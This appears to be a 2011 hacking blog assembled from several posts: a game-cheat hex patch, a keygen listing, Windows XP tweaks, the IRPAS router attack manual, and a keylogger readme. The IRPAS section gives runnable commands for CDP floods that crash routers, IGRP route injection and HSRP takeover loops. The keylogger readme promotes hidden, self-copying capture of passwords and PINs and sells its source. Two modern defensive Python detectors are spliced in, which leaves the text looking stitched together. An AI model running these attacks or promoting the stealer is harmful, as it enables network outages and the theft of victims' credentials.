Saturday, 19 November 2011
Friday, 28 October 2011
Cheat Engine 6.0 Ninja Saga 1 Hit Kill
HEX : 62 04 D3 24 64 A3 A2
Once it is detected in plugin-container, move it to the list and replace it with 62 04 D3 24 64 A2 A2. Don't forget to move it again, if necessary for up to 2 or 4 entries in the list, to avoid errors.
Sunday, 16 October 2011
Friday, 30 September 2011
Wednesday, 28 September 2011
Wednesday, 21 September 2011
Monday, 19 September 2011
Tuesday, 19 July 2011
IRPAS (Internetwork Routing Protocol Attack Suite)
IRPAS contains at the moment the following tools:
cdp
This program is for sending CDP (Cisco router Discovery Protocol) messages to the wire.
igrp
As the name suggests, this tool is for sending Interior Gateway Routing Protocol messages.
irdp
As the name suggests, this tool is for sending ICMP router discovery protocol messages.
irdpresponder
Waits for IRDP requests and sends out response packets to fool clients.
ass
ASS is an Autonomous System Scanner. Because routing protocols use autonomous systems to distinguish between various routing “domains” and various ways to communicate, you need something which works like a TCP port scanner but knows more than one protocol. This is ASS.
file2cable
sends out raw ethernet frames from files
itrace
traceroute(1) by ICMP echo request
tctrace
traceroute(1) by TCP SYN packets
netenum
enumeration / ping-sweep tool
netmask
ICMP netmask request
protos
IP protocol scanner
hsrp
HSRP takeover tool
These tools are not point-and-click. You should at least know what you want to do with the particular protocol. So if you are not familiar with CDP, don't try to use it.
CDP
CDP is a layer 2 protocol used by Cisco routers to discover each other on the same link (segment). This protocol is not routed and therefore this tool is only useful in the local segment. CDP messages contain information about the sending Cisco router. These include the device ID (hostname), port ID (which port was the sender), the platform it is running on, the software incl. version, what the box is capable of and which network address (IP address) the interface has. If not configured otherwise, Cisco routers send these messages out every 30 seconds. In our case (ethernet), they are sent to a special MAC address (01:00:0C:CC:CC:CC) and are therefore received by every Cisco router in the same segment. Other routers store the data and hold it for a time defined in the message (the tool uses the maximum of 255 seconds).
Very interesting is that Cisco IOS uses the device ID as the key to find out whether the received message is an update and the neighbor is already known or not. If the device ID is too long, this test seems to fail and you constantly fill up the router's memory.
The CDP tool can be used in two different modes:
The flood mode is used to send garbage CDP messages to the wire, which has different effects on the routers depending on their IOS version. It has not been tested thoroughly which version of IOS reacts in which way on which kind of Cisco hardware. So if you come across something, please report it. IOS 11.1(1) was tested and the router could match even long device IDs but rebooted after receiving three or four random device ID names. Most other IOS versions just store the message and fill up the memory. When you try to debug CDP events, all IOS versions we tested crashed and rebooted.
To use CDP, you have to specify the ethernet interface you will be working on: -i eth0
Everything else is optional.
-v verbose
-n x send x packets
-l x length of the device id string. Keep in mind, that the
whole ethernet frame has to be smaller than 1514 bytes.
The maximum length is therefore 1480 for the device id
(default is 1400)
-c c fills the device id with the char ‘c’
(default is ‘A’)
-r makes the device id a random string of characters, which
leads to no matching on the receiver Cisco and to memory fillup
or crash
Example:
./cdp -i eth0 -n 10000 -l 1480 -r
Hint: if you want to flood the routers completely, start two processes of cdp with different sizes. One of them running on full size (1480) to fill up the major part of the memory and another to fill up the rest with a length of 10 octets.
The second mode for CDP is spoofing. You can enable this mode with the command line option -m 1. It has no actual use for attacking routers and is mostly targeted at social engineering or just at confusing the local administrator. It is used to send out 100% valid CDP information packets which look as if they were generated by other Cisco routers. Here, you can specify any part of a CDP message yourself.
-i <interface> ethernet interface
-v verbose
-D <string> device id string
-P <string> port id string
-L <string> platform string
-S <string> software string
-F <ip address> ip address of the interface
-C <capabilities> the capabilities of the device you are claiming to be:
R – Router, T – Trans Bridge, B – Source Route Bridge,
S – Switch, H – Host, I – IGMP, r – Repeater
Combine the letters to a string: RI means Router and IGMP
Example:
./cdp -v -i eth0 -m 1 -D 'Hacker' -P 'Ethernet0' -C RI \
-L 'Intel' -S "`uname -a`" -F '255.255.255.255'
Which results on the cisco router in the following information:
cisco#sh cdp neig detail
-------------------------
Device ID: Hacker
Entry address(es):
IP address: 255.255.255.255
Platform: Intel, Capabilities: Router IGMP
Interface: Ethernet0, Port ID (outgoing port): Ethernet0
Holdtime : 238 sec
Version :
Linux attack 2.2.10 #10 Mon Feb 7 19:24:43 MET 2000 i686 unknown
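Seen from the monitoring side, the flood mode described above leaves two symptoms on the wire: Device ID values far longer than any hostname, and many different Device IDs arriving from one source MAC. The following is an added example, not part of IRPAS or of the original page; it parses captured CDP frames and reports both. The thresholds, the helper names and the sample frames are assumptions made for the illustration.

```python
import hashlib
import struct
from collections import defaultdict

CDP_DST_MAC = bytes.fromhex("01000ccccccc")   # multicast MAC named on this page
CDP_SNAP = bytes.fromhex("aaaa0300000c2000")  # LLC/SNAP header that precedes CDP
TLV_DEVICE_ID = 0x0001
MAX_DEVICE_ID_LEN = 64   # assumed policy threshold; real hostnames are far shorter
MAX_IDS_PER_SOURCE = 3   # assumed policy threshold per source MAC


def parse_cdp(frame: bytes):
    """Return (src_mac, ttl, {tlv_type: value}), or None if not well-formed CDP."""
    if len(frame) < 26 or frame[0:6] != CDP_DST_MAC or frame[14:22] != CDP_SNAP:
        return None
    # Bound parsing by the 802.3 length field so Ethernet padding is ignored.
    end = min(len(frame), 14 + struct.unpack("!H", frame[12:14])[0])
    _version, ttl, _checksum = struct.unpack("!BBH", frame[22:26])
    tlvs, off = {}, 26
    while off + 4 <= end:
        tlv_type, tlv_len = struct.unpack("!HH", frame[off:off + 4])
        # tlv_len includes the 4-byte header; never trust it past the frame end.
        if tlv_len < 4 or off + tlv_len > end:
            return None
        tlvs.setdefault(tlv_type, frame[off + 4:off + tlv_len])
        off += tlv_len
    return frame[6:12].hex(":"), ttl, tlvs


class CdpMonitor:
    """Tracks Device IDs per source MAC and reports the two flood symptoms."""

    def __init__(self):
        self.ids_by_source = defaultdict(set)

    def observe(self, frame: bytes):
        """Return a list of alert strings for one captured frame."""
        parsed = parse_cdp(frame)
        if parsed is None:
            return []
        src_mac, _ttl, tlvs = parsed
        device_id = tlvs.get(TLV_DEVICE_ID, b"")
        alerts = []
        if len(device_id) > MAX_DEVICE_ID_LEN:
            alerts.append(f"{src_mac}: oversized Device ID ({len(device_id)} bytes)")
        # Store a short digest, and stop adding once over the limit, so the
        # monitor cannot be made to hoard memory the way the routers do.
        seen = self.ids_by_source[src_mac]
        if len(seen) <= MAX_IDS_PER_SOURCE:
            seen.add(hashlib.sha256(device_id).digest()[:8])
        if len(seen) > MAX_IDS_PER_SOURCE:
            alerts.append(f"{src_mac}: more than {MAX_IDS_PER_SOURCE} distinct Device IDs")
        return alerts


def sample_frame(src_mac: str, device_id: bytes, ttl: int = 180) -> bytes:
    """Constructed capture data for the demo: one Device ID TLV, checksum zeroed."""
    tlv = struct.pack("!HH", TLV_DEVICE_ID, 4 + len(device_id)) + device_id
    payload = CDP_SNAP + struct.pack("!BBH", 2, ttl, 0) + tlv
    return CDP_DST_MAC + bytes.fromhex(src_mac) + struct.pack("!H", len(payload)) + payload


def demo():
    """Feed constructed frames to the monitor and collect every alert."""
    mon = CdpMonitor()
    frames = [sample_frame("00112233aa01", b"core-sw1.example")]      # ordinary neighbor
    frames.append(sample_frame("00112233aa02", b"A" * 1400))          # oversized Device ID
    frames += [sample_frame("00112233aa03", b"id-%d" % i) for i in range(5)]  # changing IDs
    return [alert for frame in frames for alert in mon.observe(frame)]


if __name__ == "__main__":
    print("\n".join(demo()))
```

On ports where no Cisco neighbor is expected, disabling CDP on the interface removes the exposure altogether; the monitor is for the links where CDP has to stay on.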
IGRP
IGRP is a tool for route injection. The routing protocol IGRP is no longer really widely used in the outside world, but for the first steps, we decided to use this one as a starting point.
The whole purpose is to define a routing table with all possible parameters by hand without having your system actually running any kind of dynamic routing and sending this information out to the victim system(s). Since IGRP is a broadcast based protocol, the default behavior is to send these messages to the ip broadcast address (255.255.255.255). If you want to inject a route to a system remote from you, you have to address the ‘update’ accordingly and make sure that you send the packet(s) with the right source address, so the victim system accepts the update.
Before using the tool, you have to design the routing table you want to inject into the target router. It should contain data which makes your route the preferred one for the victim. The format is:
destination:delay:bandwith:mtu:reliability:load:hopcount
where destination is the network (192.168.1.0), delay is in ms/10, bandwidth in MBit per second, MTU is the maximum transfer unit (1500 for ethernet), reliability and load are in percent (255=100%, 1=0%) and hopcount just in hops.
Empty lines and lines beginning with # are ignored.
Example:
# Routes file for igrp.c
#
# FX
# Phenoelit (http://www.phenoelit.de/)
#
# Format
# destination:delay:bandwith:mtu:reliability:load:hopcount
#
# Examples
222.222.222.0:500:1:1500:255:1:0
Usage: ./igrp -i <interface> -f <routes.file> -a <autonomous system> …
-i <interface> interface
-v verbose
-f <routes file> file, which contains the routes
(as much as you like)
-a <autonomous system> autonomous system the IGRP process is running
on, use ASS to find it out or specify a
range to use with -a START -b STOP to send
updates to all AS from START to STOP
(I highly recommend using ASS for this!!)
-S <spoofed source IP> maybe you need this
-D <destination IP> If you don’t specify this, the broadcast
address is used
If you want the routes to be persistent (after some testing around), make up a shell loop and run the program within this loop every 25-30 seconds, to keep the victim believing your routes.
ASS
ASS, the autonomous system scanner, is designed to find the AS of the router. It supports the following protocols: IRDP, IGRP, EIGRP, RIPv1, RIPv2, CDP, HSRP and OSPF.
In passive mode (./ass -i eth0), it just listens to routing protocol packets (like broadcast and multicast hellos).
In active mode (./ass -i eth0 -A), it tries to discover routers by asking for information. This is done to the appropriate address for each protocol (either broadcast or multicast addresses). If you specify a destination address, this will be used but may be not as effective as the defaults.
EIGRP scanning is done differently: While scanning, ASS listens for HELLO packets and then scans the AS directly on the router who advertised himself. You can force EIGRP scanning into the same AS-Scan behavior as IGRP uses by giving a destination or into multicast scanning by the option -M.
For Active mode, you can select the protocols you want to scan for. If you don’t select them, all are scanned. You select protocols by giving the option -P and any combination of the following chars: IER12, where:
I = IGRP
E = EIGRP
R = IRDP
1 = RIPv1
2 = RIPv2
Usage is trivial:
./ass [-v[v[v]]] -i <interface> [-p] [-c] [-A] [-M] [-P IER12]
-a <autonomous system start> -b <autonomous system stop>
[-S <spoofed source IP>] [-D <destination ip>]
[-T <packets per delay>]
Where:
-i <interface> interface
-v verbose
-A this sets the scanner into active mode
-P <protocols> see above (usage: -P EIR12)
-M EIGRP systems are scanned using the multicast
address and not by HELLO enumeration and
direct query
-a <autonomous system> autonomous system to start from
-b <autonomous system> autonomous system to stop with
-S <spoofed source IP> maybe you need this
-D <destination IP> If you don’t specify this, the appropriate
address per protocol is used
-p don’t run in promiscuous mode (bad idea)
-c terminate after scanning. This is not
recommended since answers may arrive later and
you could see some traffic that did not show
up during your scans
-T <packets per delay> after how many packets we should wait some
milliseconds (-T 1 is the slowest scan,
-T 100 begins to become unreliable)
I really suggest using -v !
I’m not going to explain why you do not get answers from routers in the Internet. If you don't know what the 'network x.y.z.0' statement for cisco means, forget that you know this program exists (sorry..)
ASS output might look a little strange, but it has its meanings:
Routers are identified by the sender’s IP address of the packet. This may lead to several routers showing up as more than one since they used different sender interfaces. In the brackets, the protocols this router runs are shown.
Routing protocols are shown as one or more indented lines. First, there is the routing protocol name (like EIGRP), followed by the autonomous system number in brackets. Aligned to the right is the target network if applicable.
IGRP
IGRP routing info shows the target network and in brackets the following values: Delay, Bandwidth, MTU, Reliability, Load and Hopcount.
IRDP
The IRDP info is limited to the announced gateway (router) and its preference
RIPv1
RIPv1 info just gives you the classified target network (remember RIPv1 network boundaries) and its metric
RIPv2
RIPv2 info contains after the target network the following infos: Netmask, next hop, arbitrary tag, and the metric. An additional line may appear on the routers section that gives you the authentication if enabled in the protocol. For text auth, the password is there.
EIGRP basic
The basic EIGRP just gives you the autonomous system number, the IOS and EIGRP version as found in the HELLO packet
EIGRP routes
The EIGRP routes section depends on the type of route. All of them include the fields destination network, destination mask and in the last line (in brackets) the values for Delay, Bandwidth, MTU, Reliability, Load and Hopcount. External routes also include the originating router, the originating autonomous system, the external metric and the source of this route.
HSRP
HSRP info is not routing, therefore the third field is the virtual IP address of the standby group, followed by the state, the auth string, Hello, Hold and priority values.
OSPF
OSPF info includes the destination network as well as the Area in IP format, the authentication used (and, if applicable the auth string), netmask, designated and backup router and the values for Dead, Priority and Hello.
IRDP
This tool sends out IRDP responses. Nothing else.
Usage:
-i <interface> interface
-p <preference> preference of this entry, default is 0
-l <lifetime> lifetime of the entry, default: 1800
-S <spoofed source IP> maybe you need this
-D <destination IP> If you don’t specify this, the broadcast
address is used
IRDPresponder
Sniffer, which listens to IRDP requests (solicitation) and answers. Sends out periodic updates.
Usage:
-v verbose
-P enable promiscuous mode
-i <interface> interface
-p <preference> preference of this entry, default is 0
-l <lifetime> lifetime of the entry, default: 1800
-S <spoofed source IP> maybe you need this
-D <destination IP> If you don’t specify this, the
broadcast address is used
file2cable
This tool is perfect to find new vulnerabilities and test concepts. It sends out any binary file as Ethernet frame – AS IT IS. So make sure you know what you do. Hint: use xxd from the vim package to produce the binary file from hex dumps.
Usage:
-v verbose (hex dump to screen)
-i <int> interface
-f <file> the file you want to send
itrace
Itrace is a program that implements traceroute(1) functionality using ICMP echo request packets. Therefore, it looks like you are just pinging your target while you traceroute there. It often helps tracing behind firewalls.
Usage: ./itrace -i eth0 -d www.phenoelit.de
-v verbose
-n reverse lookup answering IPs (slow!)
-p x send x probes per hop (default=3)
-m x set TTL max to x (default=30)
-t x timeout after x seconds (default=3)
-i interface the normal eth0 stuff
-d destination Name or IP of destination
tctrace
TCtrace is like itrace a traceroute(1) brother – but it uses TCP SYN packets to trace. This makes it possible for you to trace through firewalls if you know one TCP service that is allowed to pass from the outside.
Usage: ./tctrace -i eth0 -d www.phenoelit.de
-v verbose
-n reverse lookup answering IPs (slow!)
-p x send x probes per hop (default=3)
-m x set TTL max to x (default=30)
-t x timeout after x seconds (default=3)
-D x Destination port x (default=80)
-S x Source port x (default=1064)
-i interface the normal eth0 stuff
-d destination Name or IP of destination
netenum
netenum can be used to produce lists of hosts for other programs. It’s not as powerful as other ping-sweep tools, but it’s simple. When giving a timeout, it uses ICMP echo request to find available hosts. If you don’t supply a timeout, it just prints an IP address per line, so you can use them in shell scripts.
Usage: ./netenum 10.1.2.3/25
netenum <destination> [timeout] [verbosity]
destination can be in the following formats:
dotted IP address: 10.1.1.1
IP and Netmask: 10.1.1.1/255.255.255.0
IP and “slashmask”: 10.1.1.1/24
Name: www.phenoelit.de
timeout applies for the whole operation!
verbosity is between 0 (quiet) to 3 (verbose)
An application would be a remote HSRP attack:
for i in `netenum 10.1.2.0/26`
do
./hsrp -d ${i} -v192.168.1.22 -a cisco -g 1 -i eth0
done
netmask
netmask asks for the netmask by ICMP.
Usage: ./netmask -d destination -t timeout
protos
Protos is an IP protocol scanner. It goes through all possible IP protocols and uses a negative scan to sort out unsupported protocols which should be reported by the target using ICMP protocol unreachable messages.
Usage: ./protos -i eth0 -d 10.1.2.3 -v
-v verbose
-V show which protocols are not supported
-u don’t ping targets first
-s make the scan slow (for very remote devices)
-L show the long protocol name and its reference (RFC)
-p x number of probes (default=5)
-S x sleeptime is x (default=1)
-a x continue scan afterwards for x seconds (default=3)
-d dest destination (IP or IP/MASK)
-i interface the eth0 stuff
-W don’t scan, just print the protocol list
Normal output for a Windows host looks like this:
10.1.1.4 may be running (did not negate):
ICMP IGMP TCP UDP
While a cisco router supports more:
10.1.1.1 may be running (did not negate):
ICMP IPenc TCP IGP UDP GRE SWIPE MOBILE SUN-ND EIGRP IPIP
hsrp
HSRP protocol can be used to take over an HSRP standby IP or to force a switchover or to DoS this IP:
Usage: ./hsrp -i eth0 -v 1.2.3.4 -d 224.0.0.2 -a cisco -g 1
-i int the eth0 stuff
-v ip the standby IP address
-d dest the destination IP (multicast or directed)
-a auth the password (default=”cisco”)
-g x the standby group
-S source spoofed source if desired
To take over the standby IP 10.1.1.1 from all HSRP routers to the VIPPR IP 10.1.1.66 use
while (true)
do
./hsrp -d 224.0.0.2 -v 10.1.1.1 -a cisco -g 1 -i eth0 -S 10.1.1.66
sleep 3
done
To force 10.1.1.2 into standby (and therefore having another HSRP router taking over) use
while (true)
do
./hsrp -d 10.1.1.2 -v 10.1.1.1 -a cisco -g 1 -i eth0
sleep 3
done
Since the others will not see these messages, you can force failovers all the way
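Both HSRP loops above can be recognised from captured traffic: the speaker is not one of the configured routers, the message may be addressed to a single router instead of 224.0.0.2, and it carries the default clear-text string. The following is an added example, not part of IRPAS or of the original page; it decodes HSRP version 0 messages (the 20-byte layout from RFC 2281) and applies those three checks. The router inventory, the function names and the field values in the constructed samples are assumptions, since the page does not show what the tool puts on the wire.

```python
import ipaddress
import struct

HSRP_ALL_ROUTERS = "224.0.0.2"   # destination used in the usage line on this page
DEFAULT_AUTH = "cisco"           # default password named on this page
OPCODES = {0: "hello", 1: "coup", 2: "resign"}
STATES = {0: "initial", 1: "learn", 2: "listen", 4: "speak", 8: "standby", 16: "active"}


def parse_hsrp(payload: bytes):
    """Decode the UDP payload of an HSRP version 0 message; None if malformed."""
    if len(payload) < 20:
        return None
    version, opcode, state, hello, hold, priority, group, _reserved = struct.unpack(
        "!8B", payload[:8])
    if version != 0 or opcode not in OPCODES or state not in STATES:
        return None
    return {
        "opcode": OPCODES[opcode], "state": STATES[state],
        "hello": hello, "hold": hold, "priority": priority, "group": group,
        # 8-byte clear-text authentication field, NUL padded
        "auth": payload[8:16].rstrip(b"\x00").decode("ascii", "replace"),
        "vip": str(ipaddress.IPv4Address(payload[16:20])),
    }


def check_hsrp(src_ip: str, dst_ip: str, payload: bytes, known_routers: set):
    """Return a list of findings for one captured HSRP message."""
    msg = parse_hsrp(payload)
    if msg is None:
        return ["malformed HSRP payload"]
    findings = []
    if src_ip not in known_routers:
        findings.append(
            f"{src_ip} is not a configured HSRP router but sent {msg['opcode']}/"
            f"{msg['state']} for group {msg['group']} ({msg['vip']}), "
            f"priority {msg['priority']}")
    if dst_ip != HSRP_ALL_ROUTERS:
        findings.append(f"HSRP message addressed to {dst_ip} instead of {HSRP_ALL_ROUTERS}")
    if msg["auth"] == DEFAULT_AUTH:
        findings.append(f"group {msg['group']} uses the default authentication string")
    return findings


def sample_hsrp(opcode, state, priority, group, auth, vip):
    """Constructed capture data for the demo (hello 3 s, hold 10 s)."""
    return (struct.pack("!8B", 0, opcode, state, 3, 10, priority, group, 0)
            + auth.encode().ljust(8, b"\x00")[:8]
            + ipaddress.IPv4Address(vip).packed)


def demo():
    """Run the checks over three constructed captures; one findings list per capture."""
    routers = {"10.1.1.2", "10.1.1.3"}   # assumed inventory of the real HSRP peers
    captures = [
        # legitimate active router, non-default string
        ("10.1.1.2", "224.0.0.2", sample_hsrp(0, 16, 110, 1, "n0tcisco", "10.1.1.1")),
        # unknown speaker on the multicast group, as in the first loop above
        ("10.1.1.66", "224.0.0.2", sample_hsrp(0, 16, 255, 1, "cisco", "10.1.1.1")),
        # message directed at one router, as in the second loop above
        ("10.1.1.50", "10.1.1.2", sample_hsrp(0, 16, 255, 1, "cisco", "10.1.1.1")),
    ]
    return [check_hsrp(src, dst, data, routers) for src, dst, data in captures]


if __name__ == "__main__":
    for findings in demo():
        print(findings or "ok")
```

The source-address check only helps while the sender uses an address outside the inventory; HSRP MD5 authentication, where the platform supports it, replaces the clear-text string that all three constructed takeover samples rely on.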
Monday, 18 July 2011
Saturday, 16 July 2011
Tips to Speed Up Windows XP Booting
Here are the steps to make your Windows boot faster:
Step 1 :
Open the Notepad application
Type “del c:\windows\prefetch\ntosboot-*.*/q” (without the quotes)
and save it under the name ntosboot.bat on drive c:\
Step 2 :
Then click Start–>Run–> and type gpedit.msc
Step 3 :
Click Computer Configuration–>Windows Settings–>Script–>then double-click Shutdown
Step 4 :
In Windows Shutdown Properties click Add, then Browse. Find the ntosboot.bat file you created earlier and click Open
Step 5 :
Then click OK, Apply and OK once more to finish
Step 6 :
Then click Start–>Run–> and type devmgmt.msc
Step 7 :
Click IDE ATA/ATAPI controllers–>Primary IDE Channel (double-click to open the properties)
Step 8 :
Select Advanced Settings
On Device 0 or Device 1
Change Device Type to None (only change the Device Type options that are not locked)
Step 9 :
Click IDE ATA/ATAPI controllers–>Secondary IDE Channel (double-click to open the properties)
Repeat as in Step 8
Step 10 :
Restart your computer and you can see the change.
Hope this is useful
PHP Designer 2008 Professional6.0.2.0 + Keygen
Saturday, 09 July 2011
Tuesday, 14 June 2011
RegRun Security Suite
RegRun Security Suite 6.99 release (6.9.7.80)
May 18 2011
Supported Windows 95/98/Me/NT4/2000/XP/2003/VISTA/Seven SP1 32 and 64 bit.
Compatible with all known antiviral software.
Unhackme V 5.9 partizan - kill Rootkits
is specially designed to detect and remove Rootkits.
Thursday, 02 June 2011
Key Logger V.1.8 + Jhon Ripper 1.7.7 (Download)
----------------------------------------
| MRHPx Key Logger v1.8 (PUBLIC VERSION) |
----------------------------------------
By MRHPx aka Rizal aka NeMeSiS_ByTe
Made in Between Pasuruan - Malang, Indonesia.
Pure code in Assembly 32 Bit
2o11-2o12
This is just Proof of Concept Supplement for My article.
ATTENTION.. FOR INTERNATIONAL USER READ MRHPx.diz
------------------------
| DEFINITION AND MEANING |
------------------------
A Key Logger is a program that runs behind the system (in the background), recording every
keystroke. Once a Key Logger is started, it automatically hides inside the machine to
record all data or send the data directly to the Key Logger's owner.
The owner of the Key Logger then reads the captured data carefully in the
hope of finding passwords or other useful information that
could be used in a Social Engineering attack. Put simply, a Key Logger can be
categorized as an information-stealing hack tool.
For example, a Key Logger can reveal the contents of every e-mail written by the victim.
Key Logger programs are usually found inside rootkits and trojans.
-------------------------------
| MINIMUM SOFTWARE REQUIREMENTS |
-------------------------------
OS MS Windows : - NT 3.51
- NT 4
- 2000
- XP
- 2003 Server
- 2008 Server
- Vista
- Seven
Dependencies : kernel32.dll ;)
File Size : 1) PUBLIC VERSION
10.5 KB (10,752 bytes)
BEFORE COMPRESSION
RESOURCE+ICON
2) PRIVATE VERSION
6.00 KB (6,144 bytes)
BEFORE COMPRESSION
NO RESOURCE+ICON
------------
| HOW TO USE |
------------
1) To run it, double-click the file named "MRHPx-Key-Logger.exe". Once started,
the Key Logger keeps running in the background until the target computer is restarted
or shut down. This Key Logger has no user interface, so it does not appear
on the "Applications" tab of Task Manager.
2) The LOG file containing the victim's data is named "MRHPx-KeyLogger-v1.8-PUBLICVERSION-Log.txt"
and is located in the same directory in which the Key Logger is installed. This LOG file
appears automatically when the Key Logger is run.
3) To stop the Key Logger, press the "CTRL+ALT+P" keys simultaneously on your
keyboard.
NOTE : PRIVATE VERSION users should read the instructions supplied with it.
These usage instructions apply only to PUBLIC VERSION users.
## COMPARISON OF MRHPx Key Logger PUBLIC AND PRIVATE VERSION ##
==============================================================
| FEATURE            | PUBLIC VERSION | PRIVATE VERSION |
==============================================================
| Autorun            | No             | Yes             |
--------------------------------------------------------------
| TradeMark          | Yes            | No              |
--------------------------------------------------------------
| Fake Virus Sign    | Yes            | No              |
--------------------------------------------------------------
| LOG file FIX       | No             | Yes             |
--------------------------------------------------------------
| File Run FIX       | No             | Yes             |
--------------------------------------------------------------
| Agreement Dialogue | Yes            | No              |
--------------------------------------------------------------
| Anti Hack Tools    | Yes            | No              |
--------------------------------------------------------------
| Anti Hack Methods  | Yes            | Yes             |
--------------------------------------------------------------
| Self Copying(*)    | No             | Yes             |
--------------------------------------------------------------
NOTE: The (*) mark denotes an AMBIGUOUS feature, see the explanation
---------------------
| FEATURE EXPLANATION |
---------------------
Autorun.............: Able to run automatically when the Windows OS is started.
The Key Logger keeps running in the background on the victim's computer
at all times, automatically, without troubling you. PRESENT ONLY
IN THE PRIVATE VERSION.
TradeMark...........: Identity marker of the Key Logger, in the registry and the PE strings
as well as in the LOG file (name and header).
This marker makes the Key Logger easy to detect (catch) by the
user (victim) and by antivirus (it can even be sniffed out by the worst
antivirus, one that relies only on an EP and string scanner!!!)
NOT PRESENT IN THE PRIVATE VERSION.
Fake Virus Sign.....: False-alarm virus marker. A signature in the PE algorithm.
This marker makes the Key Logger be treated as a virus (although
it actually contains no virus at all) by several
well-known antivirus products that have heuristic and similar features for
removing suspicious files. PRESENT ONLY IN THE PUBLIC VERSION.
Log file FIX........: The LOG file that stores the data is less stable in the PUBLIC VERSION.
In addition, the file name and content contain the TradeMark.
Example : When the target types using Notepad, the LOG
file records a header stating the application used
by the target for typing. This avoids a pile-up of characters and
makes it easier for the user to know which application the target used
to type a password, bank PIN, etc. PRESENT ONLY IN THE PRIVATE VERSION.
|Sample LOG display in the PRIVATE VERSION |
---------------------------------------------------------------------
| ### Rekaman Karakter dari :Naskah Ujian.txt - Notepad ### |
| Kunci jawaban soal. |
| 1. A |
| 2. C |
| 3. E |
| |
| ### Rekaman Karakter dari :Mozilla Firefox ### |
| www.wordpress.com |
| |
| ### Rekaman Karakter dari :MRHPx › Log In - Mozilla Firefox ### |
| usertest[Tab]passwordtest |
---------------------------------------------------------------------
File Run FIX........: The file being run is not limited in the PUBLIC VERSION. This
is not memory-efficient, can arouse the victim's suspicion
and makes the system unstable.
Agreement Dialogue..: Software statement and agreement dialog. In the PUBLIC VERSION this dialog
appears every time the Key Logger is run. So if misuse
occurs, for example misusing the Key Logger by installing it
on someone else's system, the targeted user will easily
find out.
Anti Hack Tools.....: Minimizes penetration by common reversing tools.
If a suspicious tool is present on the target system, the Key Logger
stops working automatically. NOT PRESENT IN THE PRIVATE VERSION.
Anti Hack Methods...: Minimizes tracing of the instructions contained in the Key Logger. Prevents
theft of code from the program I wrote.
Self Copying........: Has the ability to copy itself and change its name to that of a file that
raises no suspicion. When run, the Key Logger copies itself and
disguises itself as a Windows tool. PRESENT ONLY IN THE PRIVATE VERSION.
(*)NOTE: several Antivirus, Anti-Trojan and Anti-Malware products detect this feature
based on the copying algorithm and the presence of an unknown file in the OS;
this feature is often used by elite coders to arm their
rootkits. So this feature will most likely be disabled for the time
being until I find a better algorithm and trick.
------------------------
| REASONS AND CHRONOLOGY |
------------------------
THIS SOFTWARE IS DESIGNED FOR LEARNING PURPOSES ONLY AND NOT FOR CRIMINAL PURPOSES!!!
I deliberately made 2 versions of the Key Logger to avoid loss of control and misuse.
In the PUBLIC VERSION weaknesses (BUGS) were deliberately added because that version is downloaded
and used by many people whom I have never known. I do not want
the software I make to be misused. In addition, the feature restrictions
reduce the risk of the Key Logger being misused in criminal acts. MRHPx Key Logger
PUBLIC VERSION is available free of charge and you can get it from my personal website.
In the PRIVATE VERSION several weaknesses (BUGS) are removed because it is intended for serious users
who truly care about computer security, each of whom must be registered
and able to take responsibility for what they will do. Each copy of the PRIVATE VERSION has
a different algorithm from the others to avoid detection.
MRHPx Key Logger v1.8 PRIVATE VERSION, which is more POWERFUL and has NO FEATURE RESTRICTIONS, is
donation (charity) software, available in 2 separate packages :
1) Complete binary package, donation of Rp. 100.000
2) Complete binary and source code package, donation of Rp. 300.000
The proceeds collected from donations will be given to orphans, orphanages, the poor and
our brothers and sisters in need. I share knowledge with you and you share your fortune with
our brothers and sisters out there who need our help and care. May God give
blessings for our charity. For the donation procedure you can contact me via email, facebook or
yahoo.
Hopefully in this way everyone will be more enthusiastic about and interested in helping and caring
for others, because they can gain knowledge directly while doing good to
other people. Isn't this more useful and more affordable than buying shareware from
the internet that costs over 300 thousand (US$ 30) and gives no additional knowledge? :) Please support
this donation's success with your prayers.
"Knowledge is Ability, Knowledge mean Glory, Knowledge for Charity"
---------
| CONTACT |
---------
Email : mrhpx@yahoo.com
Facebook : www.facebook.com/mrhpx
Website : www.mrhpx.co.nr
Mirror : www.mrhpx.astalavista.ms
To companies, Bussines person or Computer security bussines in Indonesia who need My skill or looking
for a man with unique knowledge like Me. You are welcome to hire Me. Just contact Me. This year I plan
to move from My old job company. I was bored because they don't give Me a freedom feeling to work, just
wasted My time a lot. Thanx.
----------------------------
| PERJANJIAN DAN PERSETUJUAN |
----------------------------
Dengan menggunakan software ini Anda otomatis menyetujui menggunakan software ini untuk tujuan LEGAL
dan bukan ILLEGAL. Anda terikat pada disclaimer dan terms di "MRHPx.diz" dan website MRHPx aka Rizal
di "http://www.mrhpx.co.nr" dan lainnya.
Semua resiko dan tanggungjawab penggunaan software ini adalah milik Anda. MRHPx aka Rizal tidak
bertanggungjawab terhadap kerusakan, penyalahgunaan, kerugian apapun pada orang dan properti milik Anda
karena memasang dan menggunakan MRHPx Key Logger.
PERHATIAN : software ini adalah 100% rootkit INFO STEALER yang mempunyai kemampuan untuk menyimpan data
(contoh : Password, PIN banking, Email, etc) dari masukan keyboard dan bekerja secara background.
Tidak menginfeksi, menghapus, merubah, membagi, merusak data ataupun mengirimkan data dalam bentuk apapun
dari dan ke luar dari sistem Anda ke pihak lain mencakup publik ataupun pembuat software.
Pergunakan software ini hanya untuk pengujian terhadap keamanan sistem, komputer dan jaringan resmi milik
anda, bukan milik orang lain.
--------------------------------
| Greetz but NO CREDITS fly to : |
--------------------------------
My Family.. My Love.. My Cats.. My God and Prophet.. Astalavista.. 0Day.. All friends who help Me a lot until
this day in IRiS, LUCiFER, BlackStorm, Kocok Jaya, BinusHacker, iRC, uCF, dT, AGAiN, AiR, LZ0, FOSi, ASSiGN,
DVT, 29A, TSRh, tPORT, FFF.. All Indonesia veteran haxx0r.. Underground communities.. Fellow students from my time
at Univ. Islam Malang, Univ. Brawijaya Malang, Univ. Muhammadiyah Malang.. Colleagues at PT. Malindo
Feedmill, PT. Panca Patriot Prima, PT. Wonokoyo Joyo Corporindo, PT. Cheil Jedang Samsung Group, PT. Charoen
Pokphand Indonesia and My Family Bussines Company (Mama.. I can do it, I am trying, I will never tire.)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| PUBLIC MESSAGES: STOP ISLAM PHOBIA! |
| STOP CRIME AGAINST HUMANITY! |
| STOP CRIME AGAINST RELIGION! |
| STOP ALL TERRORIST ACTIVITIES! |
| ISLAM IS LOVE, PEACE, EMPHATY! |
| INDONESIA IS THE BEST COUNTRY EVER! |
| PASURUAN IS THE BEST TOURISM EVER! |
